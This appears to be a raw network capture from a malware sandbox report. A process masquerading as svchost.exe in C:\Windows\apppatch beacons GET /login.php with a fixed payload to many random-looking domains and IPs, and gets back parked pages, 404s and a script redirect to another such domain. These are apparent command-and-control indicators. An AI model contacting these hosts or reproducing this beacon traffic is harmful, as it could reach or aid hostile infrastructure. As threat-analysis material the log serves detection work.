type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNDQzODgyMiwiaWF0IjoxNzI0NDMxNjIyLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydm42aXI0NDFoMHRhMnY2YWcwYmFmNDYiLCJuYmYiOjE3MjQ0MzE2MjIsInRzIjoxNzI0NDMxNjIyMTIyMjA4fQ.BHCRiez0Con86KddMGsehpcTbWt4MqaQk6ziSlKmf8I&sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88');</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49656	91.195.240.19	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:01.647768021 CEST	277	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:02.370780945 CEST	1236	IN	HTTP/1.1 200 OK date: Fri, 23 Aug 2024 16:47:02 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA== last-modified: Fri, 23 Aug 2024 16:47:02 GMT x-cache-miss-from: parking-89b87dbbb-97tcb server: Parking/1.0 Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 67 35 72 6c 58 73 39 52 75 52 57 34 64 67 6c 71 51 35 4c 79 64 4a 45 74 74 53 54 56 42 73 66 70 54 67 35 59 62 54 62 54 67 78 51 79 43 78 4a 61 58 2f 34 77 57 7a 74 49 41 4f 75 52 6c 32 79 56 59 68 58 30 57 47 46 31 59 61 65 77 33 55 38 35 6e 47 49 35 75 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 67 61 68 79 71 61 68 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 67 61 68 79 71 61 68 20 [TRUNCATED] Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==><head><meta charset="utf-8"><title>gahyqah.com - gahyqah Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="gahyqah.com is your first and best source for all of the information youre looking for. From ge
Aug 23, 2024 18:47:02.371756077 CEST	224	IN	Data Raw: 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 67 61 68 79 71 61 68 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c 6c Data Ascii: neral topics to more of what you would expect to find here, gahyqah.com has it all. We hope you find what you are searching for!"><link 576 rel="icon" type="image/png" href="//img.sedoparking.com/t
Aug 23, 2024 18:47:02.371767044 CEST	1236	IN	Data Raw: 65 6d 70 6c 61 74 65 73 2f 6c 6f 67 6f 73 2f 73 65 64 6f 5f 6c 6f 67 6f 2e 70 6e 67 22 0a 2f 3e 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 37 2e 30 2e 30 20 7c 20 4d 49 54 20 4c 69 63 Data Ascii: emplates/logos/sedo_logo.png"/><style> /! normalize.css v7.0.0 \| MIT License \| github.com/necolas/normalize.css /html{line-height:1.15;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,footer,header
Aug 23, 2024 18:47:02.373781919 CEST	1236	IN	Data Raw: 6d 6c 20 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 2c 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 7d 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a Data Ascii: ml [type=button],[type=reset],[type=submit]{-webkit-appearance:button}button::-moz576-focus-inner,[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner{border-style:none;padding:0}button:-moz-focusr
Aug 23, 2024 18:47:02.373792887 CEST	448	IN	Data Raw: 64 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 68 65 61 64 65 72 5f 5f 63 6f 6e 74 65 6e 74 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 Data Ascii: der{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-buybox__content-buybox{display:inline-block;text-align:left}.container-buybox__content-heading{font-size:15px}.c
Aug 23, 2024 18:47:02.377532005 CEST	1236	IN	Data Raw: 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a Data Ascii: ;text-align:center}.container-searchbox__content{display:inline-block;font-family:arial,sans-serif;font-size:12px}.container-searchbox__searchtext-label{display:none}.container-searchbox__input,.container-searchbox__button{border:0 none}.conta
Aug 23, 2024 18:47:02.377545118 CEST	224	IN	Data Raw: 35 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 35 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f Data Ascii: 5f;font-size:12px;padding-top:15px;padding-bottom:15px}.container-cookie-message__content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-right:15%}.container-cookie-message__content-interactiv
Aug 23, 2024 18:47:02.377552986 CEST	1236	IN	Data Raw: 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 3a 30 20 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d Data Ascii: e{text-align:left;margin:0 15px;font-size:10px}.container-cookie-message__content-interactive-header,.container-cookie-message__content-interactive-text{color:#fff}.container-cookie-message__content-interactive-header{font-size:small}.containe
Aug 23, 2024 18:47:02.379880905 CEST	1236	IN	Data Raw: 78 20 32 35 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 6d 61 72 67 69 6e 3a 35 70 78 3b 74 72 61 6e 73 69 74 69 6f 6e Data Ascii: x 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transition:.3s}.btn--success{background-color:#218838;border-color:#218838;color:#fff;font-size:x-large}.btn--success:hover{background-color:#1a6b2c;border-color:#1a6b2c;c
Aug 23, 2024 18:47:02.379894018 CEST	1236	IN	Data Raw: 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 2d 2d 72 6f 75 6e 64 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 34 70 78 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 2d 2d 72 6f 75 6e 64 3a 62 65 66 6f Data Ascii: ansition:.4s}.switch__slider--round{border-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:
Aug 23, 2024 18:47:02.382414103 CEST	1236	IN	Data Raw: 65 64 2e 70 6e 67 22 29 20 23 30 65 31 36 32 65 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 6c 65 66 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 39 34 25 20 36 34 30 70 78 3b 66 6c 65 78 2d 67 72 6f 77 3a 32 3b 7a 2d 69 6e 64 Data Ascii: ed.png") #0e162e no-repeat center left;background-size:94% 640px;flex-grow:2;z-index:-1;top:50px;position:inherit}.container-content__right{background:url("//img.sedoparking.com/templates/bg/arrows-curved.png") #0e162e no-repeat center left;ba

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49657	172.234.222.143	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:01.898557901 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49658	5.79.71.225	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:01.962342978 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:15.205637932 CEST	17	IN	HTTP/1.1 200 OK Data Raw: Data Ascii:
Aug 23, 2024 18:47:15.206259966 CEST	17	IN	HTTP/1.1 200 OK Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49659	64.190.63.136	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:02.463293076 CEST	306	OUT	GET / HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww3.galyqaz.com Connection: Keep-Alive Cookie: vsid=926vr471977221402211128 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:03.185971975 CEST	1236	IN	HTTP/1.1 200 OK date: Fri, 23 Aug 2024 16:47:03 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_evc7N5FfUOmf13Nl+8D7+0irHI6C5wXyjgvzJn+lB3E1Qfjr/bYz10KXDPAJSx76rgq4GXBHZuidQRM73OngZw== last-modified: Fri, 23 Aug 2024 16:47:03 GMT x-cache-miss-from: parking-89b87dbbb-97tcb server: Parking/1.0 Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 65 76 63 37 4e 35 46 66 55 4f 6d 66 31 33 4e 6c 2b 38 44 37 2b 30 69 72 48 49 36 43 35 77 58 79 6a 67 76 7a 4a 6e 2b 6c 42 33 45 31 51 66 6a 72 2f 62 59 7a 31 30 4b 58 44 50 41 4a 53 78 37 36 72 67 71 34 47 58 42 48 5a 75 69 64 51 52 4d 37 33 4f 6e 67 5a 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 67 61 6c 79 71 61 7a 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED] Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_evc7N5FfUOmf13Nl+8D7+0irHI6C5wXyjgvzJn+lB3E1Qfjr/bYz10KXDPAJSx76rgq4GXBHZuidQRM73OngZw==><head><meta charset="utf-8"><title>galyqaz.com - This website is for sale! - galyqaz Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! galyqaz.com is your first and best
Aug 23, 2024 18:47:03.186605930 CEST	1236	IN	Data Raw: 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f Data Ascii: source for all of the information youre looking for. From general topics to more of what you would expect to find here, galyqaz.com h15D8as it all. We hope you find what you are searching for!"><link rel="icon" type="im
Aug 23, 2024 18:47:03.186616898 CEST	1236	IN	Data Raw: 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 Data Ascii: lay:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visib
Aug 23, 2024 18:47:03.188390017 CEST	672	IN	Data Raw: 74 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 Data Ascii: tton;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.anno
Aug 23, 2024 18:47:03.188400030 CEST	1236	IN	Data Raw: 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 Data Ascii: ration:none}.container-searchbox{margin-bottom:50px;text-align:center}.container-searchbox__content{display:inline-block;font-family:arial,sans-serif;font-size:12px}.container-searchbox__searchtext-label{display:none}.container-searchbox__inpu
Aug 23, 2024 18:47:03.190713882 CEST	1236	IN	Data Raw: 6e 3a 66 69 78 65 64 3b 62 6f 74 74 6f 6d 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 35 66 35 66 35 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 35 70 78 3b 70 61 64 Data Ascii: n:fixed;bottom:0;width:100%;background:#5f5f5f;font-size:12px;padding-top:15px;padding-bottom:15px}.container-cookie-message__content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-right:15%}.container-cookie-me
Aug 23, 2024 18:47:03.190726042 CEST	1236	IN	Data Raw: 65 3a 63 6f 6c 6c 61 70 73 65 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 62 6f 64 79 20 74 61 62 6c 65 20 74 64 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 35 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d Data Ascii: e:collapse}.cookie-modal-window__content-body table td{padding-left:15px}.cookie-modal-window__content-necessary-cookies-1B4Erow{background-color:#dee1e3}.disabled{display:none;z-index:-999}.btn{display:inline-block;border-style:solid;bord
Aug 23, 2024 18:47:03.198024988 CEST	1236	IN	Data Raw: 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 Data Ascii: position:absolute;cursor:pointer;top:0;left:0;right:0;bottom:0;background-color:#5a6268;-webkit-transition:.4s;transition:.4s}.switch__slider:before{position:absolute;content:"";height:26px;width:26px;left:4px;bottom:4px;background-color:#fff;
Aug 23, 2024 18:47:03.198038101 CEST	1236	IN	Data Raw: 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 61 64 73 2d 2d 74 77 6f 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 36 2e 35 25 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 77 65 62 61 72 63 68 69 76 65 7b 6d 61 72 67 69 6e 2d 74 6f Data Ascii: tent__container-ads--twot{margin-top:6.5%}.container-content__webarchive{margin-top:4.5%}.container-content__header{color:#848484;font-size:15px;margin:0}.container-content__left{background:url("//img.sedoparking.com/templates/bg/arrows.png")
Aug 23, 2024 18:47:03.198049068 CEST	1236	IN	Data Raw: 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 68 65 61 64 65 72 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 37 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e Data Ascii: _list-element-header-link{font-size:37px;font-weight:bold;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-element-text{padding:3px 0 6px 0;margin:.11em 0;line-height:18px;color:#fff}.two-tier-ads-list__list-element-link{font-s
Aug 23, 2024 18:47:03.200207949 CEST	1236	IN	Data Raw: 2d 64 6f 6d 61 69 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 0a 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 Data Ascii: -domain{display:block;text-align:center} </style><script type="text/javascript"> var dto = {"uiOptimize":false,"singleDomainName":"galyqaz.com","domainName":"galyqaz.com","domainPrice":2999,"domainCurrency":"USD","adultFlag":false

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49660	154.212.231.82	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:03.193403959 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:04.229182959 CEST	696	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 23 Aug 2024 16:47:04 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 23, 2024 18:47:04.242908955 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:04.673296928 CEST	696	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 23 Aug 2024 16:47:04 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 23, 2024 18:47:53.356293917 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
